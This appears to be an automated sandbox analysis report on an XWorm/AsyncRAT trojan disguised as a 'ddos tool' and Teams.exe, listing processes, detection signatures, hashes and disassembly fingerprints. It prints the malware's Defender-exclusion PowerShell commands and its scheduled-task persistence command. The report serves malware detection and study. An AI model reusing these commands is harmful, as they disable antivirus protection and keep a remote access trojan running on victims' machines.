                                                          Target ID:2
                                                          Start time:16:19:53
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\lil bot.bat" "
                                                          Imagebase:0x7ff6765f0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:3
                                                          Start time:16:19:53
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:4
                                                          Start time:16:19:53
                                                          Start date:03/01/2025
                                                          Path:C:\Users\user\AppData\Local\Temp\Teams.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\Teams.exe"
                                                          Imagebase:0x8d0000
                                                          File size:191'488 bytes
                                                          MD5 hash:45AB951734AFA65081F4D0A6F8D2175E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2933576803.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2938411155.0000000012B91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2938411155.0000000012B91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Teams.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Teams.exe, Author: Joe Security
                                                          • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\Teams.exe, Author: Sekoia.io
                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Teams.exe, Author: ditekSHen
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 79%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:16:19:58
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:16:19:58
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:16:20:04
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Teams.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:16:20:04
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:16:20:13
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\SystemUser.dll'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:16:20:13
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:16:20:28
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser.dll'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:16:20:28
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:16:20:49
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser" /tr "C:\Users\user\AppData\Local\Temp\SystemUser.dll"
                                                          Imagebase:0x7ff70bfa0000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:16:20:49
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:18
                                                          Start time:16:20:50
                                                          Start date:03/01/2025
                                                          Path:C:\Users\user\AppData\Local\Temp\SystemUser.dll
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\Temp\SystemUser.dll
                                                          Imagebase:0xdd0000
                                                          File size:191'488 bytes
                                                          MD5 hash:45AB951734AFA65081F4D0A6F8D2175E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, Author: Joe Security
                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, Author: Joe Security
                                                          • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, Author: Sekoia.io
                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, Author: ditekSHen
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 79%, ReversingLabs
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:16:20:58
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\OpenWith.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                          Imagebase:0x7ff768fc0000
                                                          File size:123'984 bytes
                                                          MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:16:20:58
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:21
                                                          Start time:16:21:01
                                                          Start date:03/01/2025
                                                          Path:C:\Users\user\AppData\Local\Temp\SystemUser.dll
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\Temp\SystemUser.dll
                                                          Imagebase:0xd0000
                                                          File size:191'488 bytes
                                                          MD5 hash:45AB951734AFA65081F4D0A6F8D2175E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:22
                                                          Start time:16:21:06
                                                          Start date:03/01/2025
                                                          Path:C:\Windows\System32\OpenWith.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                          Imagebase:0x7ff768fc0000
                                                          File size:123'984 bytes
                                                          MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Executed Functions

                                                            Function 00007FF848E60D80 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1999658645.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_ddos tool.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H
                                                            • API String ID: 0-2852464175
                                                            • Opcode ID: 6b36855cfc2e2f5900eb0a1ce0d7150cc4d8501da34b072b4155116820fa28c7
                                                            • Instruction ID: 7715abefc3db492fea8235d892ed86a1bf01bb3dfe1e23f2b9ca0cae0a071ccb
                                                            • Opcode Fuzzy Hash: 6b36855cfc2e2f5900eb0a1ce0d7150cc4d8501da34b072b4155116820fa28c7
                                                            • Instruction Fuzzy Hash: 4831BA6284E3D25FC70367705C664A07FF0AE43260B4E40EBD8C4DB4E3E51C6A9AC322
                                                            Function 00007FF848E6110D Relevance: .4, Instructions: 415COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1999658645.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_ddos tool.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 658f21ae9a08b666e6da57d9f602d3bab4f71916d27a73c99b332f5a12dd1885
                                                            • Instruction ID: 3e7f8de5a78bd91b56badf8f3c8893505b950f61ebad70aabc09d90f32704680
                                                            • Opcode Fuzzy Hash: 658f21ae9a08b666e6da57d9f602d3bab4f71916d27a73c99b332f5a12dd1885
                                                            • Instruction Fuzzy Hash: 1B31B431A0DA8D9FD785E73888696B97BF1FF99241B0400BBD44DD3293DE28AC058711
                                                            Function 00007FF848E609F7 Relevance: .2, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1999658645.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_ddos tool.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cc8586530baeff534f7b5527a829838990c0c20b997ba43bcccce83e38d8f484
                                                            • Instruction ID: f0e59226091a9aa41d6898ed68d526b37be10df50bbd439b03943017094ddac4
                                                            • Opcode Fuzzy Hash: cc8586530baeff534f7b5527a829838990c0c20b997ba43bcccce83e38d8f484
                                                            • Instruction Fuzzy Hash: 40717F30A199198FEB98FB28C458BADB7E2FF54354F544168E05AE32D5CF38AC42CB44
                                                            Function 00007FF848E60498 Relevance: .1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1999658645.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_ddos tool.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ff7615a873a7b99773f02aa98147cc80a61c812d19f926a2e647cf55ff9a2567
                                                            • Instruction ID: 65209a7b137f76b776d62c4df267d28552581cfc4d514d5c87a93c209d33ffca
                                                            • Opcode Fuzzy Hash: ff7615a873a7b99773f02aa98147cc80a61c812d19f926a2e647cf55ff9a2567
                                                            • Instruction Fuzzy Hash: 77217431F1994D9FEB94FB2C88596BD77E2FF98741B44007AD40ED3296DE24A8418741
                                                            Function 00007FF848E60951 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1999658645.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_ddos tool.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8fe280f8996a97664ce3cc1240a59c6cc8da64022f528e407b2e5e528259d866
                                                            • Instruction ID: 3d38264cbd0d5c0dac17ff2ad416c305e985f40b9b3a151ea62d8a50b0bdfe94
                                                            • Opcode Fuzzy Hash: 8fe280f8996a97664ce3cc1240a59c6cc8da64022f528e407b2e5e528259d866
                                                            • Instruction Fuzzy Hash: 1A11CEB1C19A488FEB44EFA8C4492EDBBF1FF98314F54816AD044F7282DF74A9468B45
                                                            Function 00007FF848E60E71 Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1999658645.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_ddos tool.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4df50f3350da78825033abdabe76cd67c7c04643af862bd9310b26ce0ef452b
                                                            • Instruction ID: 0b90cc85b1bd92de4b86a2b49ea7d12717967ce49f058fcdf0482ada7c6315a9
                                                            • Opcode Fuzzy Hash: d4df50f3350da78825033abdabe76cd67c7c04643af862bd9310b26ce0ef452b
                                                            • Instruction Fuzzy Hash: 52012631A1DA694FD798F73C98516A933D1FF88744F400579C449C3386DA3CF8428781
                                                            Function 00007FF848E604A8 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1999658645.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_ddos tool.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44a6b22e5b907eb1447cefbee836844d7981187a7fc795d7bc5fc5ae78d23267
                                                            • Instruction ID: c5ada96396b6427fa4a1bfa7bffee812c325cc92de783e6b609c288b07c30ceb
                                                            • Opcode Fuzzy Hash: 44a6b22e5b907eb1447cefbee836844d7981187a7fc795d7bc5fc5ae78d23267
                                                            • Instruction Fuzzy Hash: 01F02821A2E96A5FDB58B63C984167A73C1EF88744F500535D40DD3386CE38B8428B84
                                                            Function 00007FF848E604B0 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1999658645.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_ddos tool.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c012b3746910af5f5bc799cf2411e71baa64e8c0826f6afd7b02328a68b2ad96
                                                            • Instruction ID: 76b267a6fe445f1c2e7c6f44fe9f3d1d6356e4017f97e66b4e00f2d54de519a0
                                                            • Opcode Fuzzy Hash: c012b3746910af5f5bc799cf2411e71baa64e8c0826f6afd7b02328a68b2ad96
                                                            • Instruction Fuzzy Hash: 77F0A430B2D9299FDA98B72C984567A73D1FB88744F500539D44ED3385DF38B8428B85
                                                            Function 00007FF848E60F3F Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1999658645.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_ddos tool.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc371295d49ddb350ac0b67f532bb081ad34db16a30b057474e55021cea29678
                                                            • Instruction ID: a7272d5d832627afad1c27b19b854676d5c69cd8ab0b6d7c6e35616f5a9256d2
                                                            • Opcode Fuzzy Hash: fc371295d49ddb350ac0b67f532bb081ad34db16a30b057474e55021cea29678
                                                            • Instruction Fuzzy Hash: 94E08611F2DD194FE6A8756C24652B8A7C1EB98650F805035D00DD22C7ED299C824245

                                                            Execution Graph

                                                            Execution Coverage:26.3%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:33.3%
                                                            Total number of Nodes:9
                                                            Total number of Limit Nodes:0

                                                            Executed Functions

                                                            Function 00007FF848E7E218 Relevance: 6.1, Strings: 4, Instructions: 1089COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7ff848e7e218-7ff848e7e249 4 7ff848e7e2ad-7ff848e7e2d9 0->4 5 7ff848e7e24b-7ff848e8381c 0->5 12 7ff848e7e33c-7ff848e7e373 4->12 13 7ff848e7e2db-7ff848e82549 4->13 16 7ff848e8381e 5->16 17 7ff848e83823-7ff848e8383e 5->17 24 7ff848e7e3bd-7ff848e7e3c5 12->24 25 7ff848e7e375-7ff848e7e380 call 7ff848e70a40 12->25 52 7ff848e8254b 13->52 53 7ff848e82550-7ff848e8255f 13->53 16->17 22 7ff848e83845-7ff848e83a4e call 7ff848e7ac28 call 7ff848e7ac38 call 7ff848e7ac48 call 7ff848e7df58 call 7ff848e808b0 call 7ff848e808c0 17->22 23 7ff848e83840 17->23 157 7ff848e83a53-7ff848e83aa3 call 7ff848e83aa4 22->157 23->22 27 7ff848e7e43b 24->27 28 7ff848e7e3c7-7ff848e7e3e4 24->28 32 7ff848e7e385-7ff848e7e3bc 25->32 35 7ff848e7e440-7ff848e7e455 27->35 28->35 37 7ff848e7e3e6-7ff848e7e436 call 7ff848e7d460 28->37 32->24 42 7ff848e7e457-7ff848e7e46e call 7ff848e71228 call 7ff848e70a50 35->42 43 7ff848e7e473-7ff848e7e488 35->43 76 7ff848e7f07b-7ff848e7f089 37->76 42->76 59 7ff848e7e4bf-7ff848e7e4d4 43->59 60 7ff848e7e48a-7ff848e7e4b3 call 7ff848e71228 43->60 52->53 71 7ff848e7e4e7-7ff848e7e4fc 59->71 72 7ff848e7e4d6-7ff848e7e4e2 call 7ff848e7abd8 59->72 87 7ff848e7e4ba 60->87 82 7ff848e7e4fe-7ff848e7e501 71->82 83 7ff848e7e542-7ff848e7e557 71->83 72->76 82->27 84 7ff848e7e507-7ff848e7e512 82->84 91 7ff848e7e559-7ff848e7e55c 83->91 92 7ff848e7e598-7ff848e7e5ad 83->92 84->27 86 7ff848e7e518-7ff848e7e53d call 7ff848e70a28 call 7ff848e7abd8 84->86 86->76 87->76 91->27 95 7ff848e7e562-7ff848e7e56d 91->95 101 7ff848e7e5af-7ff848e7e5b2 92->101 102 7ff848e7e5da-7ff848e7e5ef 92->102 95->27 99 7ff848e7e573-7ff848e7e593 call 7ff848e70a28 call 7ff848e7a9e8 95->99 99->76 101->27 104 7ff848e7e5b8-7ff848e7e5d5 call 7ff848e70a28 call 7ff848e7a9f0 101->104 112 7ff848e7e6c7-7ff848e7e6dc 102->112 113 7ff848e7e5f5-7ff848e7e641 call 7ff848e709b0 102->113 104->76 124 7ff848e7e6de-7ff848e7e6e1 112->124 125 7ff848e7e6fb-7ff848e7e710 112->125 113->27 158 7ff848e7e647-7ff848e7e67f call 7ff848e77700 113->158 124->27 127 7ff848e7e6e7-7ff848e7e6f6 call 7ff848e7a9c8 124->127 136 7ff848e7e732-7ff848e7e747 125->136 137 7ff848e7e712-7ff848e7e715 125->137 127->76 144 7ff848e7e749-7ff848e7e762 136->144 145 7ff848e7e767-7ff848e7e77c 136->145 137->27 139 7ff848e7e71b-7ff848e7e72d call 7ff848e7a9c8 137->139 139->76 144->76 153 7ff848e7e77e-7ff848e7e797 145->153 154 7ff848e7e79c-7ff848e7e7b1 145->154 153->76 162 7ff848e7e7b3-7ff848e7e7cc 154->162 163 7ff848e7e7d1-7ff848e7e7e6 154->163 158->27 180 7ff848e7e685-7ff848e7e6c2 call 7ff848e7ac08 158->180 162->76 171 7ff848e7e80f-7ff848e7e824 163->171 172 7ff848e7e7e8-7ff848e7e7eb 163->172 181 7ff848e7e82a-7ff848e7e879 171->181 182 7ff848e7e8c4-7ff848e7e8d9 171->182 172->27 175 7ff848e7e7f1-7ff848e7e80a 172->175 175->76 180->76 187 7ff848e7e8db-7ff848e7e8ec 182->187 188 7ff848e7e8f1-7ff848e7e906 182->188 187->76 195 7ff848e7e90c-7ff848e7e932 188->195 196 7ff848e7e9a6-7ff848e7e9bb 188->196 205 7ff848e7e933-7ff848e7e95b 195->205 203 7ff848e7e9bd-7ff848e7e9ce 196->203 204 7ff848e7e9d3-7ff848e7e9e8 196->204 203->76 209 7ff848e7ea1a-7ff848e7ea2f 204->209 210 7ff848e7e9ea-7ff848e7ea15 call 7ff848e70d40 call 7ff848e7d460 204->210 216 7ff848e7e95d-7ff848e7e984 205->216 217 7ff848e7eb0c-7ff848e7eb21 209->217 218 7ff848e7ea35-7ff848e7eb07 call 7ff848e70d40 call 7ff848e7d460 209->218 210->76 216->27 233 7ff848e7e98a-7ff848e7e9a1 216->233 225 7ff848e7ebe8-7ff848e7ebfd 217->225 226 7ff848e7eb27-7ff848e7eb2a 217->226 218->76 236 7ff848e7ebff-7ff848e7ec0c call 7ff848e7d460 225->236 237 7ff848e7ec11-7ff848e7ec26 225->237 227 7ff848e7ebdd-7ff848e7ebe2 226->227 228 7ff848e7eb30-7ff848e7eb3b 226->228 240 7ff848e7ebe3 227->240 228->227 231 7ff848e7eb41-7ff848e7ebdb call 7ff848e70d40 call 7ff848e7d460 228->231 231->240 233->76 236->76 246 7ff848e7ec9d-7ff848e7ecb2 237->246 247 7ff848e7ec28-7ff848e7ec39 237->247 240->76 255 7ff848e7ecb4-7ff848e7ecb7 246->255 256 7ff848e7ecf2-7ff848e7ed07 246->256 247->27 253 7ff848e7ec3f-7ff848e7ec47 call 7ff848e70a20 247->253 262 7ff848e7ec4c-7ff848e7ec4f 253->262 255->27 259 7ff848e7ecbd-7ff848e7ece8 call 7ff848e70a18 call 7ff848e70a28 call 7ff848e7a9a0 255->259 264 7ff848e7ed4d-7ff848e7ed62 256->264 265 7ff848e7ed09-7ff848e7ed48 call 7ff848e78f50 call 7ff848e7bd10 call 7ff848e7a9a8 256->265 298 7ff848e7eced 259->298 266 7ff848e7ec7b-7ff848e7ec98 call 7ff848e70a20 call 7ff848e70a28 call 7ff848e7a9a0 262->266 267 7ff848e7ec51-7ff848e7ec76 call 7ff848e7d460 262->267 281 7ff848e7ed68-7ff848e7edfd call 7ff848e70d40 call 7ff848e7d460 264->281 282 7ff848e7ee02-7ff848e7ee17 264->282 265->76 266->76 267->76 281->76 282->76 302 7ff848e7ee1d-7ff848e7ee24 282->302 298->76 305 7ff848e7ee37-7ff848e7ee68 302->305 306 7ff848e7ee26-7ff848e7ee30 call 7ff848e7ac18 302->306 305->76 306->305
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `M_I$aM_^$aM_$Q_H
                                                            • API String ID: 0-157175364
                                                            • Opcode ID: 5409ccad2c1096e3040e487cb511d6aa2936ea0d00db65de71f223a293998ba4
                                                            • Instruction ID: fcaeaed52780581f6bd0ec1925da42bf3c5824550e4eb1700370c35005072fb0
                                                            • Opcode Fuzzy Hash: 5409ccad2c1096e3040e487cb511d6aa2936ea0d00db65de71f223a293998ba4
                                                            • Instruction Fuzzy Hash: 6E729E20E1D90A9FEB98FB7884956B9B3D2FF99380F544579D01EC3286DF38E8028745
                                                            Function 00007FF848E71290 Relevance: 2.0, Strings: 1, Instructions: 744COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
